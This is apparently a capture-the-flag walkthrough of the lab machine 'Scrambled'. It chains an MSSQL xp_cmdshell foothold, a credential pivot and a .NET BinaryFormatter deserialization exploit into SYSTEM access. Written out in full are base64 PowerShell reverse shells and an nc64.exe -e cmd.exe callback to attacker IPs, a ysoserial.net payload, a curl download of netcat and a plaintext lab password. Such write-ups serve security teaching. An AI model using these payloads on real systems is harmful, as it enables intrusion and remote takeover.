Execute: MSSQL has the ability to run commands via the xp_cmdshell stored procedure. It is possible to do so here, but the service account doesn’t have access to much of anything on the box, and it was meant to largely be a dead end.

In addition, if we enable the de xp_cmdshell module, we can execute commands on the machine.

SQL> xp_cmdshell whoami
output                                                                                
scrm\sqlsvc                                                                        
NULL

In order to get a reverse shell, you can use the "PowerShell #3 (Base64)" from revshells.com.

Online - Reverse Shell Generatorwww.revshells.com

SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANgAiACwANQA1ADUANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555               
listening on [any] 5555 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.168] 52741

PS C:\Windows\system32> whoami
scrm\sqlsvc

PS C:\Windows\system32> powershell -ep bypass

PS C:\Windows\system32> net users
User accounts for \\DC1
-------------------------------------------------------------------------------
administrator            asmith                   backupsvc                
ehooker                  Guest                    jhall                    
khicks                   krbtgt                   ksimpson                 
miscsvc                  rsmith                   sdonington               
sjenkins                 sqlsvc                   tstar                    
The command completed successfully.

Running a whoami /priv command shows us that we do have SeImpersonatePrivilege. Since we have those privileges we can run a potato attack against the sql server and should be able to obtain access as SYSTEM.

PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Using Powershell Credential Object to gain shell as MiscSvc

Now, we need to create another reverse shell in order to become MiscSvc, obtaining the user flag. For doing so, execute the following commands:

Create another Windows base64 encoded payload for the MiscSvc reverse shell and then execute the payload as MiscSvc.

Online - Reverse Shell Generatorwww.revshells.com

$pswd = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $pswd)

Invoke-Command -Computer dc1 -Credential $Cred -ScriptBlock {powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANgAiACwAMgA1ADYAMAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=}

┌──(kali💀kali)-[~]
└─$ nc -lnvp 2560
listening on [any] 2560 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.168] 50014

PS C:\Users\miscsvc\Documents> cd ..
PS C:\Users\miscsvc> cd Desktop
PS C:\Users\miscsvc\Desktop> ls
    Directory: C:\Users\miscsvc\Desktop
Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-ar---       31/01/2024     02:10             34 user.txt                                          


PS C:\Users\miscsvc\Desktop> type user.txt
1c2c01dfdba78d65d0----------------

PRIV ESC: Shell as System

Enumeration:

PS C:\Users\miscsvc\Desktop> whoami /priv

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

ScrambleClient Reverse:

Files: Both files are 32-bit .NET executables:

PS C:\Users\miscsvc\Documents> cd C:\Shares                                                    
PS C:\Shares> cd IT                                                                            
PS C:\Shares\IT> cd Apps
PS C:\Shares\IT\Apps> cd Sales*
PS C:\Shares\IT\Apps\Sales Order Client> ls

    Directory: C:\Shares\IT\Apps\Sales Order Client
Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-a----       05/11/2021     20:52          86528 ScrambleClient.exe                                
-a----       05/11/2021     20:52          19456 ScrambleLib.dll

Connect: I’ll jump over to a Windows VM (this part is the same as the Windows Post). Running the EXE pops the same windows from the IT pages: With my VPN connected and my C:\Windows\System32\drivers\etc\hosts file updated, I’ll click “Edit” and enter the server (the port is already filled): I’ll also check the “Enable debug logging” box. Trying to “Sign In” with any of the creds I have fails: If I try that again with WireShark, it shows it’s a text-based protocol:

Credentials: Opening the binaries in DNSpy, I’ll start with an overview of the files:

GitHub - dnSpy/dnSpy: .NET debugger and assembly editorGitHub

LoginWindow seems promising. Several functions down, there’s a Logon function: Clicking on the Logon that’s called from this._Client.Logon jumps over into the ScrambleNetClient class in ScrambleLib, where Logon is defined: There’s a backdoor account if the username is “scrmdev”! Going back to the app, changing the username to that works:

LIST_ORDERS: In WireShark, there’s a new TCP stream (not from the login, as I bypassed that) fetching orders: The client send LIST_ORDERS; on successful login. The returned base64 string is a serialized .NET object:

Debug Log: If I enabled it in the connection settings, or by going to “Tools” > “Enable Debug Logging”, it will write ScrambleDebugLog.txt in the same directory as the exe. This is not only another way to see the serialized payloads, but there are some hints in there as well: “Binary formatter init successful” will be useful in the next attack. I can see exactly in the code where this happens, in the SalesOrder class in ScrambleLib.dll:

Deserialization Attack:

Generate Payload: I’ll download the latest copy of ysoserial.net from the release page. This is a tool that will generate .NET serialized payloads that will abuse different gadgets in the existing code to get code execution. I’ve not been able to get this tool to run on Linux, so I will have to jump to a Windows VM to generate this payload.

Releases · pwntester/ysoserial.netGitHub

Some Googling about the binary formatter class specifically will show it’s insecure. From Microsoft doc:

Deserialization risks in use of BinaryFormatter and related types - .NETMicrosoftLearn

Knowing the plugin that’s installed, I just need to pick a gadget. They are all listed on the GitHub page or with ysoserial.exe -h. I want one that works with BinaryFormatter, and I’ll start with ones that don’t require any special conditions. AxHostState seems like a good start (many will work). I’ll it:

.\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "C:\\programdata\\nc64.exe 10.10.14.6 444 -e cmd.exe"

AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAL8DAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA4QU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgQzpcXHByb2dyYW1kYXRhXFxuYzY0LmV4ZSAxMC4xMC4xNC42IDQ0NCAtZSBjbWQuZXhlIiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgsL

Send Payload: I’ll listen with nc on TCP 444 and connect to 4411 with nc:

PS C:\Shares\IT\Apps\Sales Order Client> cd C:\programdata
PS C:\programdata> curl http://10.10.16.6:80/nc64.exe -o nc64.exe

Just like in WireShark, I’ll enter UPLOAD_ORDER;[serialized object]:

┌──(kali💀kali)-[~]
└─$ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;

UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAL8DAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA4QU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgQzpcXHByb2dyYW1kYXRhXFxuYzY0LmV4ZSAxMC4xMC4xNi42IDQ0NCAtZSBjbWQuZXhlIiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgsL

It throws an error, and hangs. At nc:

┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap -cAr nc -lnvp 444
listening on [any] 444 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.168] 60188

Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Users\administrator\Desktop

C:\Users\administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\administrator\Desktop>type root.txt
type root.txt
13baba7fa83670------------------

PreviousFuse

Last updated 1 year ago

hashtag Reconnaissance:

hashtag EM: Website - TCP 80

hashtag EM: KERBEROS

hashtag FOOTHOLD: Shell as MiscSvc

hashtag Kerberoast:

hashtag MSSQL Access: Silver Ticket

hashtagUsing Powershell Credential Object to gain shell as MiscSvc

hashtag PRIV ESC: Shell as System

hashtag Deserialization Attack: